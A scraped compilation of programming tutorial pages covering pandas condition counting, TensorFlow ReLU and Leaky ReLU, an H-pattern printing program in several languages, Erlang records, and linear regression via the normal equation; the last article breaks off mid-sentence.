# DataFrame # Printing the DataFrameprint(my_df.to_string()) # Calculating the number of views greater than 30# as well as likes less than 20sum = sum((my_df.likes < 20) & (my_df.views > 30))print(\"Likes less than 20 and Views more than 30: \", sum)", "e": 3020, "s": 2640, "text": null }, { "code": null, "e": 3027, "s": 3020, "text": "Output" }, { "code": null, "e": 3153, "s": 3027, "text": "We will use a single | sign to separate the conditions. | is used as either the first condition OR second OR third and so on." }, { "code": null, "e": 3161, "s": 3153, "text": "Python3" }, { "code": "import pandas as pd # Datamy_data = {\"views\": [12, 13, 100, 80, 91], \"likes\": [3, 8, 23, 17, 56]}my_df = pd.DataFrame(my_data) # DataFrame # Printing the DataFrameprint(my_df.to_string()) # Calculating the number of views greater than 30# or likes less than 20sum = sum((my_df.likes < 20) | (my_df.views > 30))print(\"Likes less than 20 or Views more than 30: \", sum)", "e": 3532, "s": 3161, "text": null }, { "code": null, "e": 3539, "s": 3532, "text": "Output" }, { "code": null, "e": 3546, "s": 3539, "text": "Picked" }, { "code": null, "e": 3560, "s": 3546, "text": "Python-pandas" }, { "code": null, "e": 3567, "s": 3560, "text": "Python" } ]
Python | Tensorflow nn.relu() and nn.leaky_relu()
13 Sep, 2018 Tensorflow is an open-source machine learning library developed by Google. One of its applications is to developed deep neural networks. The module tensorflow.nn provides support for many basic neural network operations. An activation function is a function which is applied to the output of a neural network layer, which is then passed as the input to the next layer. Activation functions are an essential part of neural networks as they provide non-linearity, without which the neural network reduces to a mere logistic regression model. The most widely used activation function is the Rectified Linear Unit (ReLU). ReLU is defined as . ReLU has become a popular choice in recent times due to the following reasons: Computationally faster: The ReLU is a highly simplified function which is easily computed. Fewer vanishing gradients: In machine learning, the update to a parameter is proportional to the partial derivative of the error function with respect to that parameters. If the gradient becomes extremely small, the updates will not be effective and the network might stop training at all. The ReLU does not saturate in the positive direction, whereas other activation functions like sigmoid and hyperbolic tangent saturate in both directions. Therefore, it has fewer vanishing gradients resulting in better training. The function nn.relu() provides support for the ReLU in Tensorflow. Syntax: tf.nn.relu(features, name=None) Parameters:features: A tensor of any of the following types: float32, float64, int32, uint8, int16, int8, int64, bfloat16, uint16, half, uint32, uint64.name (optional): The name for the operation. Return type: A tensor with the same type as that of features. # Importing the Tensorflow libraryimport tensorflow as tf # A constant vector of size 6a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype = tf.float32) # Applying the ReLu function and# storing the result in 'b'b = tf.nn.relu(a, name ='ReLU') # Initiating a Tensorflow sessionwith tf.Session() as sess: print('Input type:', a) print('Input:', sess.run(a)) print('Return type:', b) print('Output:', sess.run(b)) Output: Input type: Tensor("Const_10:0", shape=(6, ), dtype=float32) Input: [ 1. -0.5 3.4000001 -2.0999999 0. -6.5 ] Return type: Tensor("ReLU_9:0", shape=(6, ), dtype=float32) Output: [ 1. 0. 3.4000001 0. 0. 0. ] Leaky ReLU:The ReLU function suffers from what is called the “dying ReLU” problem. Since the slope of the ReLU function on the negative side is zero, a neuron stuck on that side is unlikely to recover from it. This causes the neuron to output zero for every input, thus rendering it useless. A solution to this problem is to use Leaky ReLU which has a small slope on the negative side. The function nn.leaky_relu() provides support for the ReLU in Tensorflow. Syntax: tf.nn.leaky_relu(features, alpha, name=None) Parameters:features: A tensor of any of the following types: float32, float64, int32, uint8, int16, int8, int64, bfloat16, uint16, half, uint32, uint64.alpha: The slope of the function for x < 0. Default value is 0.2.name (optional): The name for the operation. Return type: A tensor with the same type as that of features. # Importing the Tensorflow libraryimport tensorflow as tf # A constant vector of size 6a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype=tf.float32) # Applying the Leaky ReLu function with# slope 0.01 and storing the result in 'b'b = tf.nn.leaky_relu(a, alpha=0.01, name='Leaky_ReLU') # Initiating a Tensorflow sessionwith tf.Session() as sess: print('Input type:', a) print('Input:', sess.run(a)) print('Return type:', b) print('Output:', sess.run(b)) Output: Input type: Tensor("Const_2:0", shape=(6,), dtype=float32) Input: [ 1. -0.5 3.4000001 -2.0999999 0. -6.5 ] Return type: Tensor("Leaky_ReLU_1/Maximum:0", shape=(6,), dtype=float32) Output: [ 1. -0.005 3.4000001 -0.021 0. -0.065 ] Neural Network Python-Functions Tensorflow Machine Learning Python Machine Learning Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n13 Sep, 2018" }, { "code": null, "e": 249, "s": 28, "text": "Tensorflow is an open-source machine learning library developed by Google. One of its applications is to developed deep neural networks. The module tensorflow.nn provides support for many basic neural network operations." }, { "code": null, "e": 746, "s": 249, "text": "An activation function is a function which is applied to the output of a neural network layer, which is then passed as the input to the next layer. Activation functions are an essential part of neural networks as they provide non-linearity, without which the neural network reduces to a mere logistic regression model. The most widely used activation function is the Rectified Linear Unit (ReLU). ReLU is defined as . ReLU has become a popular choice in recent times due to the following reasons:" }, { "code": null, "e": 837, "s": 746, "text": "Computationally faster: The ReLU is a highly simplified function which is easily computed." }, { "code": null, "e": 1355, "s": 837, "text": "Fewer vanishing gradients: In machine learning, the update to a parameter is proportional to the partial derivative of the error function with respect to that parameters. If the gradient becomes extremely small, the updates will not be effective and the network might stop training at all. The ReLU does not saturate in the positive direction, whereas other activation functions like sigmoid and hyperbolic tangent saturate in both directions. Therefore, it has fewer vanishing gradients resulting in better training." }, { "code": null, "e": 1423, "s": 1355, "text": "The function nn.relu() provides support for the ReLU in Tensorflow." }, { "code": null, "e": 1463, "s": 1423, "text": "Syntax: tf.nn.relu(features, name=None)" }, { "code": null, "e": 1660, "s": 1463, "text": "Parameters:features: A tensor of any of the following types: float32, float64, int32, uint8, int16, int8, int64, bfloat16, uint16, half, uint32, uint64.name (optional): The name for the operation." }, { "code": null, "e": 1722, "s": 1660, "text": "Return type: A tensor with the same type as that of features." }, { "code": "# Importing the Tensorflow libraryimport tensorflow as tf # A constant vector of size 6a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype = tf.float32) # Applying the ReLu function and# storing the result in 'b'b = tf.nn.relu(a, name ='ReLU') # Initiating a Tensorflow sessionwith tf.Session() as sess: print('Input type:', a) print('Input:', sess.run(a)) print('Return type:', b) print('Output:', sess.run(b))", "e": 2154, "s": 1722, "text": null }, { "code": null, "e": 2162, "s": 2154, "text": "Output:" }, { "code": null, "e": 2435, "s": 2162, "text": "Input type: Tensor(\"Const_10:0\", shape=(6, ), dtype=float32)\nInput: [ 1. -0.5 3.4000001 -2.0999999 0. -6.5 ]\nReturn type: Tensor(\"ReLU_9:0\", shape=(6, ), dtype=float32)\nOutput: [ 1. 0. 3.4000001 0. 0. 0. ]\n" }, { "code": null, "e": 2822, "s": 2435, "text": " Leaky ReLU:The ReLU function suffers from what is called the “dying ReLU” problem. Since the slope of the ReLU function on the negative side is zero, a neuron stuck on that side is unlikely to recover from it. This causes the neuron to output zero for every input, thus rendering it useless. A solution to this problem is to use Leaky ReLU which has a small slope on the negative side." }, { "code": null, "e": 2896, "s": 2822, "text": "The function nn.leaky_relu() provides support for the ReLU in Tensorflow." }, { "code": null, "e": 2949, "s": 2896, "text": "Syntax: tf.nn.leaky_relu(features, alpha, name=None)" }, { "code": null, "e": 3211, "s": 2949, "text": "Parameters:features: A tensor of any of the following types: float32, float64, int32, uint8, int16, int8, int64, bfloat16, uint16, half, uint32, uint64.alpha: The slope of the function for x < 0. Default value is 0.2.name (optional): The name for the operation." }, { "code": null, "e": 3273, "s": 3211, "text": "Return type: A tensor with the same type as that of features." }, { "code": "# Importing the Tensorflow libraryimport tensorflow as tf # A constant vector of size 6a = tf.constant([1.0, -0.5, 3.4, -2.1, 0.0, -6.5], dtype=tf.float32) # Applying the Leaky ReLu function with# slope 0.01 and storing the result in 'b'b = tf.nn.leaky_relu(a, alpha=0.01, name='Leaky_ReLU') # Initiating a Tensorflow sessionwith tf.Session() as sess: print('Input type:', a) print('Input:', sess.run(a)) print('Return type:', b) print('Output:', sess.run(b))", "e": 3750, "s": 3273, "text": null }, { "code": null, "e": 3758, "s": 3750, "text": "Output:" }, { "code": null, "e": 4042, "s": 3758, "text": "Input type: Tensor(\"Const_2:0\", shape=(6,), dtype=float32)\nInput: [ 1. -0.5 3.4000001 -2.0999999 0. -6.5 ]\nReturn type: Tensor(\"Leaky_ReLU_1/Maximum:0\", shape=(6,), dtype=float32)\nOutput: [ 1. -0.005 3.4000001 -0.021 0. -0.065 ]\n" }, { "code": null, "e": 4057, "s": 4042, "text": "Neural Network" }, { "code": null, "e": 4074, "s": 4057, "text": "Python-Functions" }, { "code": null, "e": 4085, "s": 4074, "text": "Tensorflow" }, { "code": null, "e": 4102, "s": 4085, "text": "Machine Learning" }, { "code": null, "e": 4109, "s": 4102, "text": "Python" }, { "code": null, "e": 4126, "s": 4109, "text": "Machine Learning" } ]
Program to print the given H Pattern
27 Apr, 2021 Given an integer N, the task is to print the Alphabet H Pattern as given below: 1 N 2 * 3 3 * 2 N * 3 2 1 * 2 3 3 2 * 1 N Examples: Input: N = 3 Output: 1 3 2 2 3 2 1 2 2 1 3 Input: N = 4 Output: 1 4 2 3 3 2 4 3 2 1 3 2 2 3 1 4 Approach: Print the Left value and leave 2 * (index – 1) blank spaces & print Right value. Print the Nth row with N to 1 number. Repeat step one for (2 * N) – 1 time to print the desired H pattern. Below is the implementation of the above approach: C++ Java Python3 C# PHP Javascript // C++ implementation of the approach#include <iostream>using namespace std; // Function to print the desired// Alphabet H Patternvoid alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) cout << ++left; else cout << --left; // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment cout << " " << " "; else cout << " " << middle--; } // Condition for the right Values if (row < N) cout << " " << --right; else cout << " " << ++right; cout << endl; }} // Driver Codeint main(){ // Size of the Pattern int N = 4; alphabetPattern(N); return 0;} // Java implementation of the approachclass GFG{// Function to print the desired// Alphabet H Patternstatic void alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) System.out.print( ++left); else System.out.print(--left); // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment System.out.print( " "); else System.out.print( " " +middle--); } // Condition for the right Values if (row < N) System.out.print( " " +--right); else System.out.print( " " + ++right); System.out.println(); }} // Driver Code public static void main(String[] args) { // Size of the Pattern int N = 4; alphabetPattern(N);// This code is contributed by Rajput-Ji }} # Python3 implementation of the approach # Function to print the desired# Alphabet H Patterndef alphabetPattern(N): # Declaring the values of left, # middle, right side left, middle, right = 0, N - 1, N + 1 # Main Row Loop for row in range(0, 2 * N - 1): # Condition for the left Values if row < N: left += 1 print(left, end = "") else: left -= 1 print(left, end = "") # Loop for the middle values for col in range(1, N - 1): # Condition for the middleValues if row != N - 1: # Two spaces for perfect alignment print(" ", end = " ") else: print(" " + str(middle), end = "") middle -= 1 # Condition for the right Values if row < N: right -= 1 print(" " + str(right), end = "") else: right += 1 print(" " + str(right), end = "") print() # Driver Codeif __name__ == "__main__": # Size of the Pattern N = 4 alphabetPattern(N) # This code is contributed by Rituraj Jain // C# implementation of the approachusing System; class GFG{ // Function to print the desired// Alphabet H Patternstatic void alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) Console.Write( ++left); else Console.Write(--left); // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment Console.Write( " "); else Console.Write( " " + middle--); } // Condition for the right Values if (row < N) Console.Write( " " + --right); else Console.Write( " " + ++right); Console.WriteLine(); }} // Driver Codepublic static void Main(String[] args){ // Size of the Pattern int N = 4; alphabetPattern(N);}} // This code is contributed by// PrinciRaj1992 <?php// PHP implementation of the approach // Function to print the desired// Alphabet H Patternfunction alphabetPattern($N){ // Declaring the values of left, // middle, right side $left = 0; $middle = $N - 1; $right = $N + 1; // Main Row Loop for ($row = 0; $row < 2 * $N - 1; $row++) { // Condition for the left Values if ($row < $N) echo (++$left); else echo (--$left); // Loop for the middle values for ($col = 1; $col < $N - 1; $col++) { // Condition for the middleValues if ($row != $N - 1) // Two spaces for perfect alignment echo " "." "; else echo " ".($middle--); } // Condition for the right Values if ($row < $N) echo " ".(--$right); else echo " ".(++$right); echo "\n"; }} // Driver Code // Size of the Pattern $N = 4; alphabetPattern($N); // This code is contributed by mits?> <script> // JavaScript implementation // of the approach // Function to print the desired // Alphabet H Pattern function alphabetPattern(N) { // Declaring the values of left, // middle, right side var left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (var row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) { ++left; document.write(left); } else { --left; document.write(left); } // Loop for the middle values for (var col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment document.write(" " + " "); else { document.write(" " + middle); middle--; } } // Condition for the right Values if (row < N) { --right; document.write(" " + right); } else { ++right; document.write(" " + right); } document.write("<br>"); } } // Driver Code // Size of the Pattern var N = 4; alphabetPattern(N); </script> 1 4 2 3 3 2 4 3 2 1 3 2 2 3 1 4 Rajput-Ji rituraj_jain princiraj1992 Mithun Kumar rdtank pattern-printing C++ Programs School Programming pattern-printing Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 54, "s": 26, "text": "\n27 Apr, 2021" }, { "code": null, "e": 136, "s": 54, "text": "Given an integer N, the task is to print the Alphabet H Pattern as given below: " }, { "code": null, "e": 230, "s": 136, "text": "1 N\n2 *\n3 3\n* 2\nN * 3 2 1\n* 2\n3 3\n2 * \n1 N" }, { "code": null, "e": 242, "s": 230, "text": "Examples: " }, { "code": null, "e": 373, "s": 242, "text": "Input: N = 3\nOutput: \n1 3\n2 2\n3 2 1\n2 2\n1 3\n\nInput: N = 4\nOutput: \n1 4\n2 3\n3 2\n4 3 2 1\n3 2\n2 3\n1 4" }, { "code": null, "e": 387, "s": 375, "text": "Approach: " }, { "code": null, "e": 468, "s": 387, "text": "Print the Left value and leave 2 * (index – 1) blank spaces & print Right value." }, { "code": null, "e": 506, "s": 468, "text": "Print the Nth row with N to 1 number." }, { "code": null, "e": 575, "s": 506, "text": "Repeat step one for (2 * N) – 1 time to print the desired H pattern." }, { "code": null, "e": 628, "s": 575, "text": "Below is the implementation of the above approach: " }, { "code": null, "e": 632, "s": 628, "text": "C++" }, { "code": null, "e": 637, "s": 632, "text": "Java" }, { "code": null, "e": 645, "s": 637, "text": "Python3" }, { "code": null, "e": 648, "s": 645, "text": "C#" }, { "code": null, "e": 652, "s": 648, "text": "PHP" }, { "code": null, "e": 663, "s": 652, "text": "Javascript" }, { "code": "// C++ implementation of the approach#include <iostream>using namespace std; // Function to print the desired// Alphabet H Patternvoid alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) cout << ++left; else cout << --left; // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment cout << \" \" << \" \"; else cout << \" \" << middle--; } // Condition for the right Values if (row < N) cout << \" \" << --right; else cout << \" \" << ++right; cout << endl; }} // Driver Codeint main(){ // Size of the Pattern int N = 4; alphabetPattern(N); return 0;}", "e": 1735, "s": 663, "text": null }, { "code": "// Java implementation of the approachclass GFG{// Function to print the desired// Alphabet H Patternstatic void alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) System.out.print( ++left); else System.out.print(--left); // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment System.out.print( \" \"); else System.out.print( \" \" +middle--); } // Condition for the right Values if (row < N) System.out.print( \" \" +--right); else System.out.print( \" \" + ++right); System.out.println(); }} // Driver Code public static void main(String[] args) { // Size of the Pattern int N = 4; alphabetPattern(N);// This code is contributed by Rajput-Ji }}", "e": 2907, "s": 1735, "text": null }, { "code": "# Python3 implementation of the approach # Function to print the desired# Alphabet H Patterndef alphabetPattern(N): # Declaring the values of left, # middle, right side left, middle, right = 0, N - 1, N + 1 # Main Row Loop for row in range(0, 2 * N - 1): # Condition for the left Values if row < N: left += 1 print(left, end = \"\") else: left -= 1 print(left, end = \"\") # Loop for the middle values for col in range(1, N - 1): # Condition for the middleValues if row != N - 1: # Two spaces for perfect alignment print(\" \", end = \" \") else: print(\" \" + str(middle), end = \"\") middle -= 1 # Condition for the right Values if row < N: right -= 1 print(\" \" + str(right), end = \"\") else: right += 1 print(\" \" + str(right), end = \"\") print() # Driver Codeif __name__ == \"__main__\": # Size of the Pattern N = 4 alphabetPattern(N) # This code is contributed by Rituraj Jain", "e": 4074, "s": 2907, "text": null }, { "code": "// C# implementation of the approachusing System; class GFG{ // Function to print the desired// Alphabet H Patternstatic void alphabetPattern(int N){ // Declaring the values of left, // middle, right side int left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (int row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) Console.Write( ++left); else Console.Write(--left); // Loop for the middle values for (int col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment Console.Write( \" \"); else Console.Write( \" \" + middle--); } // Condition for the right Values if (row < N) Console.Write( \" \" + --right); else Console.Write( \" \" + ++right); Console.WriteLine(); }} // Driver Codepublic static void Main(String[] args){ // Size of the Pattern int N = 4; alphabetPattern(N);}} // This code is contributed by// PrinciRaj1992", "e": 5254, "s": 4074, "text": null }, { "code": "<?php// PHP implementation of the approach // Function to print the desired// Alphabet H Patternfunction alphabetPattern($N){ // Declaring the values of left, // middle, right side $left = 0; $middle = $N - 1; $right = $N + 1; // Main Row Loop for ($row = 0; $row < 2 * $N - 1; $row++) { // Condition for the left Values if ($row < $N) echo (++$left); else echo (--$left); // Loop for the middle values for ($col = 1; $col < $N - 1; $col++) { // Condition for the middleValues if ($row != $N - 1) // Two spaces for perfect alignment echo \" \".\" \"; else echo \" \".($middle--); } // Condition for the right Values if ($row < $N) echo \" \".(--$right); else echo \" \".(++$right); echo \"\\n\"; }} // Driver Code // Size of the Pattern $N = 4; alphabetPattern($N); // This code is contributed by mits?>", "e": 6298, "s": 5254, "text": null }, { "code": "<script> // JavaScript implementation // of the approach // Function to print the desired // Alphabet H Pattern function alphabetPattern(N) { // Declaring the values of left, // middle, right side var left = 0, middle = N - 1, right = N + 1; // Main Row Loop for (var row = 0; row < 2 * N - 1; row++) { // Condition for the left Values if (row < N) { ++left; document.write(left); } else { --left; document.write(left); } // Loop for the middle values for (var col = 1; col < N - 1; col++) { // Condition for the middleValues if (row != N - 1) // Two spaces for perfect alignment document.write(\" \" + \" \"); else { document.write(\" \" + middle); middle--; } } // Condition for the right Values if (row < N) { --right; document.write(\" \" + right); } else { ++right; document.write(\" \" + right); } document.write(\"<br>\"); } } // Driver Code // Size of the Pattern var N = 4; alphabetPattern(N); </script>", "e": 7646, "s": 6298, "text": null }, { "code": null, "e": 7702, "s": 7646, "text": "1 4\n2 3\n3 2\n4 3 2 1\n3 2\n2 3\n1 4" }, { "code": null, "e": 7714, "s": 7704, "text": "Rajput-Ji" }, { "code": null, "e": 7727, "s": 7714, "text": "rituraj_jain" }, { "code": null, "e": 7741, "s": 7727, "text": "princiraj1992" }, { "code": null, "e": 7754, "s": 7741, "text": "Mithun Kumar" }, { "code": null, "e": 7761, "s": 7754, "text": "rdtank" }, { "code": null, "e": 7778, "s": 7761, "text": "pattern-printing" }, { "code": null, "e": 7791, "s": 7778, "text": "C++ Programs" }, { "code": null, "e": 7810, "s": 7791, "text": "School Programming" }, { "code": null, "e": 7827, "s": 7810, "text": "pattern-printing" } ]
Erlang - Records
Erlang has the extra facility to create records. These records consist of fields. For example, you can define a personal record which has 2 fields, one is the id and the other is the name field. In Erlang, you can then create various instances of this record to define multiple people with various names and id’s. Let’s explore how we can work with records. A record is created using the Record Identifier. In this record identifier, you specify the various fields which constitute the record. The general syntax and example are given below. record(recordname , {Field1,Field2 ..Fieldn}) recordname − This is the name given to the record. recordname − This is the name given to the record. Field1,Field2 ..Fieldn − These are the list of various fields which constitute the record. Field1,Field2 ..Fieldn − These are the list of various fields which constitute the record. None -module(helloworld). -export([start/0]). -record(person, {name = "", id}). start() -> P = #person{name="John",id = 1}. The above example shows the definition of a record with 2 fields, one is the id and the other is the name. Also, a record is constructed in the following way − #recordname {fieldName1 = value1, fieldName2 = value2 .. fieldNameN = valueN} Where in you assign values to the respective fields when an instance of the record is defined. To access the fields and values of a particular record, the following syntax should be used. #recordname.Fieldname recordname − This is the name given to the record. recordname − This is the name given to the record. Fieldname − This is the name of the field which needs to be accessed. Fieldname − This is the name of the field which needs to be accessed. The value assigned to the field. -module(helloworld). -export([start/0]). -record(person, {name = "", id}). start() -> P = #person{name = "John",id = 1}, io:fwrite("~p~n",[P#person.id]), io:fwrite("~p~n",[P#person.name]). The output of the above program is as follows. 1 “John” The updation of a record value is done by changing the value to a particular field and then assigning the record to a new variable name. The general syntax and example is given below. #recordname.Fieldname = newvalue recordname − This is the name given to the record. recordname − This is the name given to the record. Fieldname − This is the name of the field which needs to be accessed. Fieldname − This is the name of the field which needs to be accessed. newvalue − This is the new value which needs to be assigned to the field. newvalue − This is the new value which needs to be assigned to the field. The new record with the new values assigned to the fields. -module(helloworld). -export([start/0]). -record(person, {name = "", id}). start() -> P = #person{name = "John",id = 1}, P1 = P#person{name = "Dan"}, io:fwrite("~p~n",[P1#person.id]), io:fwrite("~p~n",[P1#person.name]). The output of the above program is as follows − 1 “Dan” Erlang also has the facility to have nested records. The following example shows how these nested records can be created. -module(helloworld). -export([start/0]). -record(person, {name = "", address}). -record(employee, {person, id}). start() -> P = #employee{person = #person{name = "John",address = "A"},id = 1}, io:fwrite("~p~n",[P#employee.id]). In the above example the following things need to be noted − We are first creating a person’s record which has the field values of name and address. We are first creating a person’s record which has the field values of name and address. We then define an employee record which has the person as a field and an additional field called id. We then define an employee record which has the person as a field and an additional field called id. The output of the above program is as follows. 1 Print Add Notes Bookmark this page
[ { "code": null, "e": 2615, "s": 2301, "text": "Erlang has the extra facility to create records. These records consist of fields. For example, you can define a personal record which has 2 fields, one is the id and the other is the name field. In Erlang, you can then create various instances of this record to define multiple people with various names and id’s." }, { "code": null, "e": 2659, "s": 2615, "text": "Let’s explore how we can work with records." }, { "code": null, "e": 2843, "s": 2659, "text": "A record is created using the Record Identifier. In this record identifier, you specify the various fields which constitute the record. The general syntax and example are given below." }, { "code": null, "e": 2890, "s": 2843, "text": "record(recordname , {Field1,Field2 ..Fieldn})\n" }, { "code": null, "e": 2941, "s": 2890, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 2992, "s": 2941, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 3083, "s": 2992, "text": "Field1,Field2 ..Fieldn − These are the list of various fields which constitute the record." }, { "code": null, "e": 3174, "s": 3083, "text": "Field1,Field2 ..Fieldn − These are the list of various fields which constitute the record." }, { "code": null, "e": 3179, "s": 3174, "text": "None" }, { "code": null, "e": 3306, "s": 3179, "text": "-module(helloworld). \n-export([start/0]). \n-record(person, {name = \"\", id}). \n\nstart() -> \n P = #person{name=\"John\",id = 1}." }, { "code": null, "e": 3466, "s": 3306, "text": "The above example shows the definition of a record with 2 fields, one is the id and the other is the name. Also, a record is constructed in the following way −" }, { "code": null, "e": 3545, "s": 3466, "text": "#recordname {fieldName1 = value1, fieldName2 = value2 .. fieldNameN = valueN}\n" }, { "code": null, "e": 3640, "s": 3545, "text": "Where in you assign values to the respective fields when an instance of the record is defined." }, { "code": null, "e": 3733, "s": 3640, "text": "To access the fields and values of a particular record, the following syntax should be used." }, { "code": null, "e": 3756, "s": 3733, "text": "#recordname.Fieldname\n" }, { "code": null, "e": 3807, "s": 3756, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 3858, "s": 3807, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 3928, "s": 3858, "text": "Fieldname − This is the name of the field which needs to be accessed." }, { "code": null, "e": 3998, "s": 3928, "text": "Fieldname − This is the name of the field which needs to be accessed." }, { "code": null, "e": 4031, "s": 3998, "text": "The value assigned to the field." }, { "code": null, "e": 4236, "s": 4031, "text": "-module(helloworld). \n-export([start/0]). \n-record(person, {name = \"\", id}). \n\nstart() -> \n P = #person{name = \"John\",id = 1}, \n io:fwrite(\"~p~n\",[P#person.id]), \n io:fwrite(\"~p~n\",[P#person.name])." }, { "code": null, "e": 4283, "s": 4236, "text": "The output of the above program is as follows." }, { "code": null, "e": 4293, "s": 4283, "text": "1\n“John”\n" }, { "code": null, "e": 4477, "s": 4293, "text": "The updation of a record value is done by changing the value to a particular field and then assigning the record to a new variable name. The general syntax and example is given below." }, { "code": null, "e": 4511, "s": 4477, "text": "#recordname.Fieldname = newvalue\n" }, { "code": null, "e": 4562, "s": 4511, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 4613, "s": 4562, "text": "recordname − This is the name given to the record." }, { "code": null, "e": 4683, "s": 4613, "text": "Fieldname − This is the name of the field which needs to be accessed." }, { "code": null, "e": 4753, "s": 4683, "text": "Fieldname − This is the name of the field which needs to be accessed." }, { "code": null, "e": 4827, "s": 4753, "text": "newvalue − This is the new value which needs to be assigned to the field." }, { "code": null, "e": 4901, "s": 4827, "text": "newvalue − This is the new value which needs to be assigned to the field." }, { "code": null, "e": 4960, "s": 4901, "text": "The new record with the new values assigned to the fields." }, { "code": null, "e": 5204, "s": 4960, "text": "-module(helloworld). \n-export([start/0]). \n-record(person, {name = \"\", id}). \n\nstart() -> \n P = #person{name = \"John\",id = 1}, \n P1 = P#person{name = \"Dan\"}, \n \n io:fwrite(\"~p~n\",[P1#person.id]), \n io:fwrite(\"~p~n\",[P1#person.name])." }, { "code": null, "e": 5252, "s": 5204, "text": "The output of the above program is as follows −" }, { "code": null, "e": 5261, "s": 5252, "text": "1\n“Dan”\n" }, { "code": null, "e": 5383, "s": 5261, "text": "Erlang also has the facility to have nested records. The following example shows how these nested records can be created." }, { "code": null, "e": 5624, "s": 5383, "text": "-module(helloworld). \n-export([start/0]). \n-record(person, {name = \"\", address}). \n-record(employee, {person, id}). \n\nstart() -> \n P = #employee{person = #person{name = \"John\",address = \"A\"},id = 1}, \n io:fwrite(\"~p~n\",[P#employee.id])." }, { "code": null, "e": 5685, "s": 5624, "text": "In the above example the following things need to be noted −" }, { "code": null, "e": 5773, "s": 5685, "text": "We are first creating a person’s record which has the field values of name and address." }, { "code": null, "e": 5861, "s": 5773, "text": "We are first creating a person’s record which has the field values of name and address." }, { "code": null, "e": 5962, "s": 5861, "text": "We then define an employee record which has the person as a field and an additional field called id." }, { "code": null, "e": 6063, "s": 5962, "text": "We then define an employee record which has the person as a field and an additional field called id." }, { "code": null, "e": 6110, "s": 6063, "text": "The output of the above program is as follows." }, { "code": null, "e": 6113, "s": 6110, "text": "1\n" }, { "code": null, "e": 6120, "s": 6113, "text": " Print" }, { "code": null, "e": 6131, "s": 6120, "text": " Add Notes" } ]
Performing Linear Regression Using the Normal Equation | by Robert Kwiatkowski | Towards Data Science
1. Introduction Linear regression is one of the most important and popular predictive techniques in data analysis. It’s also one of the oldest - famous C.F. Gauss at the beginning of 19th-century was using it in the astronomy for calculation of orbits (more). Its objective is to fit the best line (or a hyper-/plane) to the set of given points (observations) by calculating regression function parameters that minimize specific cost function (error), e.g. mean squared error (MSE). As a reminder, below there is a linear regression equation in the expanded form. In a vectorized form it looks like that: where θ is a vector of parameters weights. Usually finding the best model parameters is performed by running some kind of optimization algorithm (e.g. gradient descent) to minimize a cost function. However, it is possible to obtain values (weights) of these parameters by solving an algebraic equation called the normal equation as well. It is defined as below. 2. Hand calculations In this article, we will perform linear regression for a very basic case so we can avoid lengthy hand calculations. By the way, if you think you need to refresh your linear algebra skills, there are many good resources on the Internet (e.g. YouTube series I recommend). In this example, there are only three points (observations) with only one variable (X1). On the graph, they look like below. In this case, the linear regression equation has a form of: Features (X) and labels (y) are: Note that we add a default bias term of 1 — it will be updated during our calculations. Not adding this term will lead to a wrong solution. Step 1: Transposition of matrix X This is a relatively simple task — rows become new columns. Step 2: Multiplication on the transposed matrix and matrix X Step 3: Inversion of a resultant matrix To inverse a simple 2x2 matrix we can use the formula: Therefore, we get: Note: for bigger matrices (bigger than 3X3) inverting them becomes a much more cumbersome task and usually, the algorithmic approach is used — like Gaussian elimination. This is important to remember! Step 4: Multiplication of the inverted matrix with X transposed Step 5: Final multiplication to obtain the vector of best parameters Finally our linear regression equations takes form of: Plotting this line onto a previous graph looks like below. 3. Implementation in Python The same calculations can be implemented in Python using Numpy library which contains a set of linear algebra functions in numpy.linalg collection. import numpy as npX = np.c_[[1,1,1],[1,2,3]] # defining featuresy = np.c_[[1,3,2]] # defining labelstheta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(y) # normal equationprint(theta) Now we can define new features we would like to predict values for. X_new = np.c_[[1,1,1,1],[0, 0.5,1.5,4]] # new features By implementing equation 2 we obtain the predicted values. y_pred = X_new.dot(theta) # making predictionsprint(y_pred) 4. Comments As you see it‘s pretty easy to use the normal equation and to implement it in Python — it’s only one line of code. So why it’s not commonly used? The problem is in its numerical complexity. Solving this equation requires inverting a matrix and this is 